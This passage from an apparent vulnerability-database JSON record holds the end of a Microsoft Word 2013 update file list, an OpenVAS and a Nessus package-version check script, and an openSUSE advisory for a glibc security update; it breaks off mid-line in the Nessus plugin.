d><td>15.0.4569.1504</td><td>522408</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1053</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114368</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1053</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>621760</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1054</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114880</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1054</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>519872</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1055</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117952</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1055</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>625320</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1058</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1058</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>533184</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1066</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117952</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1066</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>527528</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_2052</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116416</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_2052</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>517312</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.dll.idx_dll_1028</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114368</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>wwintl.rest.idx_dll_1028</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>516800</td><td>26-Feb-17</td><td>01:42</td></tr><tr><td>winword.veman.xml</td><td>winword.visualelementsmanifest.xml</td><td>\u00a0</td><td>342</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>winword.veman.xml</td><td>winwordd.visualelementsmanifest.xml</td><td>\u00a0</td><td>342</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>bibform.xml_1033</td><td>bibform.xml</td><td>\u00a0</td><td>111310</td><td>23-Feb-17</td><td>04:31</td></tr><tr><td>wac.word.wwintl.dll_1033</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>874688</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1033</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>874688</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>wwintl.dll_1033</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>874688</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>msword.olb</td><td>msword.olb</td><td>\u00a0</td><td>925344</td><td>23-Feb-17</td><td>04:30</td></tr><tr><td>winword.exe</td><td>winword.exe</td><td>15.0.4911.1000</td><td>1934016</td><td>23-Feb-17</td><td>04:30</td></tr><tr><td>wrd12cnv.dll</td><td>wordcnv.dll</td><td>15.0.4911.1000</td><td>8318144</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>wrd12pxy.cnv</td><td>wordcnvpxy.cnv</td><td>\u00a0</td><td>30784</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>wrd12exe.exe</td><td>wordconv.exe</td><td>15.0.4454.1000</td><td>26192</td><td>23-Feb-17</td><td>04:29</td></tr><tr><td>wwlib.dll</td><td>wwlib.dll</td><td>15.0.4911.1000</td><td>27840192</td><td>23-Feb-17</td><td>04:30</td></tr></tbody></table></td></tr></tbody></table><h2></h2><h3>\u00a0</h3><h3>How to get help and support for this security update</h3><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-body=\"\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\"><u>Windows Update FAQ</u></a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\"><u>TechNet Security Support and Troubleshooting</u></a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\"><u>Microsoft Secure</u></a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\"><u>International Support</u></a></td></tr></tbody></table></body></html>", "edition": 56, "modified": "2020-04-16T08:13:37", "id": "KB3172464", "href": "https://support.microsoft.com/en-us/help/3172464/", "published": "2017-03-14T00:00:00", "title": "MS17-014: Description of the security update for Word 2013: March 14, 2017", "type": "mskb", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2020-01-31T18:36:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8776", "CVE-2015-8779", "CVE-2015-8778", "CVE-2014-9761", "CVE-2015-7547"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-03-01T00:00:00", "id": "OPENVAS:1361412562310851207", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851207", "type": "openvas", "title": "openSUSE: Security Advisory for glibc (openSUSE-SU-2016:0510-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851207\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-03-01 11:08:57 +0530 (Tue, 01 Mar 2016)\");\n script_cve_id(\"CVE-2014-9761\", \"CVE-2015-7547\", \"CVE-2015-8776\", \"CVE-2015-8778\",\n \"CVE-2015-8779\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for glibc (openSUSE-SU-2016:0510-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for glibc fixes the following issues:\n\n - errorcheck-mutex-no-elision.patch: Don't do lock elision on an error\n checking mutex (boo#956716, BZ #17514)\n\n - reinitialize-dl_load_write_lock.patch: Reinitialize dl_load_write_lock\n on fork (boo#958315, BZ #19282)\n\n - send-dg-buffer-overflow.patch: Fix getaddrinfo stack-based buffer\n overflow (CVE-2015-7547, boo#961721, BZ #18665)\n\n - strftime-range-check.patch: Add range check on time fields\n (CVE-2015-8776, boo#962736, BZ #18985)\n\n - hcreate-overflow-check.patch: Handle overflow in hcreate (CVE-2015-8778,\n boo#962737, BZ #18240)\n\n - refactor-nan-parsing.patch: Refactor strtod parsing of NaN payloads\n (CVE-2014-9761, boo#962738, BZ #16962)\n\n - catopen-unbound-alloca.patch: Fix unbound alloca in catopen\n (CVE-2015-8779, boo#962739, BZ #17905)\");\n\n script_tag(name:\"affected\", value:\"glibc on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:0510-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-debugsource\", rpm:\"glibc-debugsource~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-devel-debuginfo\", rpm:\"glibc-devel-debuginfo~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-devel-static\", rpm:\"glibc-devel-static~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-locale\", rpm:\"glibc-locale~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-locale-debuginfo\", rpm:\"glibc-locale-debuginfo~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-extra\", rpm:\"glibc-extra~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-extra-debuginfo\", rpm:\"glibc-extra-debuginfo~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-utils-debuginfo\", rpm:\"glibc-utils-debuginfo~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-utils-debugsource\", rpm:\"glibc-utils-debugsource~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nscd-debuginfo\", rpm:\"nscd-debuginfo~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-32bit\", rpm:\"glibc-32bit~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-debuginfo-32bit\", rpm:\"glibc-debuginfo-32bit~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-devel-32bit\", rpm:\"glibc-devel-32bit~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-devel-debuginfo-32bit\", rpm:\"glibc-devel-debuginfo-32bit~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-devel-static-32bit\", rpm:\"glibc-devel-static-32bit~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-locale-32bit\", rpm:\"glibc-locale-32bit~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-locale-debuginfo-32bit\", rpm:\"glibc-locale-debuginfo-32bit~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-profile-32bit\", rpm:\"glibc-profile-32bit~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-utils-32bit\", rpm:\"glibc-utils-32bit~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-utils-debuginfo-32bit\", rpm:\"glibc-utils-debuginfo-32bit~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-html\", rpm:\"glibc-html~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-info\", rpm:\"glibc-info~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-obsolete\", rpm:\"glibc-obsolete~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-obsolete-debuginfo\", rpm:\"glibc-obsolete-debuginfo~2.19~16.22.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:52:32", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8776", "CVE-2015-8779", "CVE-2015-8778", "CVE-2014-9761", "CVE-2015-7547"], "description": "This update for glibc fixes the following issues:\n\n - errorcheck-mutex-no-elision.patch: Don't do lock elision on an error\n checking mutex (boo#956716, BZ #17514)\n - reinitialize-dl_load_write_lock.patch: Reinitialize dl_load_write_lock\n on fork (boo#958315, BZ #19282)\n - send-dg-buffer-overflow.patch: Fix getaddrinfo stack-based buffer\n overflow (CVE-2015-7547, boo#961721, BZ #18665)\n - strftime-range-check.patch: Add range check on time fields\n (CVE-2015-8776, boo#962736, BZ #18985)\n - hcreate-overflow-check.patch: Handle overflow in hcreate (CVE-2015-8778,\n boo#962737, BZ #18240)\n - refactor-nan-parsing.patch: Refactor strtod parsing of NaN payloads\n (CVE-2014-9761, boo#962738, BZ #16962)\n - catopen-unbound-alloca.patch: Fix unbound alloca in catopen\n (CVE-2015-8779, boo#962739, BZ #17905)\n\n", "edition": 1, "modified": "2016-02-19T00:11:49", "published": "2016-02-19T00:11:49", "id": "OPENSUSE-SU-2016:0510-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00042.html", "title": "Security update for glibc (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-20T12:30:00", "description": "This update for glibc fixes the following issues :\n\n - errorcheck-mutex-no-elision.patch: Don't do lock elision\n on an error checking mutex (boo#956716, BZ #17514)\n\n - reinitialize-dl_load_write_lock.patch: Reinitialize\n dl_load_write_lock on fork (boo#958315, BZ #19282)\n\n - send-dg-buffer-overflow.patch: Fix getaddrinfo\n stack-based buffer overflow (CVE-2015-7547, boo#961721,\n BZ #18665)\n\n - strftime-range-check.patch: Add range check on time\n fields (CVE-2015-8776, boo#962736, BZ #18985)\n\n - hcreate-overflow-check.patch: Handle overflow in hcreate\n (CVE-2015-8778, boo#962737, BZ #18240)\n\n - refactor-nan-parsing.patch: Refactor strtod parsing of\n NaN payloads (CVE-2014-9761, boo#962738, BZ #16962)\n\n - catopen-unbound-alloca.patch: Fix unbound alloca in\n catopen (CVE-2015-8779, boo#962739, BZ #17905)", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-19T00:00:00", "title": "openSUSE Security Update : glibc (openSUSE-2016-233)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8776", "CVE-2015-8779", "CVE-2015-8778", "CVE-2014-9761", "CVE-2015-7547"], "modified": "2016-02-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:glibc-obsolete-debuginfo", "p-cpe:/a:novell:opensuse:glibc-devel", "p-cpe:/a:novell:opensuse:glibc-profile-32bit", "p-cpe:/a:novell:opensuse:glibc-profile", "p-cpe:/a:novell:opensuse:glibc", "p-cpe:/a:novell:opensuse:glibc-obsolete", "p-cpe:/a:novell:opensuse:glibc-debuginfo-32bit", "p-cpe:/a:novell:opensuse:glibc-devel-static", "p-cpe:/a:novell:opensuse:glibc-extra-debuginfo", "p-cpe:/a:novell:opensuse:glibc-utils-debuginfo", "p-cpe:/a:novell:opensuse:glibc-info", "p-cpe:/a:novell:opensuse:glibc-32bit", "p-cpe:/a:novell:opensuse:glibc-devel-32bit", "p-cpe:/a:novell:opensuse:glibc-locale-debuginfo", "p-cpe:/a:novell:opensuse:glibc-utils-debuginfo-32bit", "p-cpe:/a:novell:opensuse:glibc-devel-debuginfo-32bit", "p-cpe:/a:novell:opensuse:glibc-devel-static-32bit", "p-cpe:/a:novell:opensuse:glibc-debuginfo", "p-cpe:/a:novell:opensuse:glibc-locale-32bit", "p-cpe:/a:novell:opensuse:glibc-locale", "p-cpe:/a:novell:opensuse:glibc-locale-debuginfo-32bit", "p-cpe:/a:novell:opensuse:nscd-debuginfo", "p-cpe:/a:novell:opensuse:glibc-utils-32bit", "p-cpe:/a:novell:opensuse:glibc-devel-debuginfo", "p-cpe:/a:novell:opensuse:glibc-html", "p-cpe:/a:novell:opensuse:glibc-utils-debugsource", "p-cpe:/a:novell:opensuse:nscd", "p-cpe:/a:novell:opensuse:glibc-extra", "p-cpe:/a:novell:opensuse:glibc-debugsource", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:glibc-utils", "p-cpe:/a:novell:opensuse:glibc-i18ndata"], "id": "OPENSUSE-2016-233.NASL", "href": "https://www.tenable.com/plugins/nessus/88855", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-233.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88855);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-9761\", \"CVE-2015-7547\", \"CVE-2015-8776\", \"CVE-2015-8778\", \"CVE-2015-8779\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n\n script_name(english:\"openSUSE Security Update : glibc (openSUSE-2016-233)\");\n script_summary(english:\"Check for the openSUSE-2016-233 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for glibc fixes the following issues :\n\n - errorcheck-mutex-no-elision.patch: Don't do lock elision\n on an error checking mutex (boo#956716, BZ #17514)\n\n - reinitialize-dl_load_write_lock.patch: Reinitialize\n dl_load_write_lock on fork (boo#958315, BZ #19282)\n\n - send-dg-buffer-overflow.patch: Fix getaddrinfo\n stack-based buffer overflow (CVE-2015-7547, boo#961721,\n BZ #18665)\n\n - strftime-range-check.patch: Add range check on time\n fields (CVE-2015-8776, boo#962736, BZ #18985)\n\n - hcreate-overflow-check.patch: Handle overflow in hcreate\n (CVE-2015-8778, boo#962737, BZ #18240)\n\n - refactor-nan-parsing.patch: Refactor strtod parsing of\n NaN payloads (CVE-2014-9761, boo#962738, BZ #16962)\n\n - catopen-unbound-alloca.patch: Fix unbound alloca in\n catopen (CVE-2015-8779, boo#962739, BZ #17905)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=956716\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958315\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=961721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=962736\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=962737\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=962738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=962739\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-static-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-profile-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/19\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-debuginfo-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-debugsource-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-devel-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-devel-debuginfo-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-devel-static-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-extra-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-extra-debuginfo-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-html-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-i18ndata-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-info-2.19-16.22.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"glibc-locale-2.19-16.22.2\") ) flag++;\nif ( 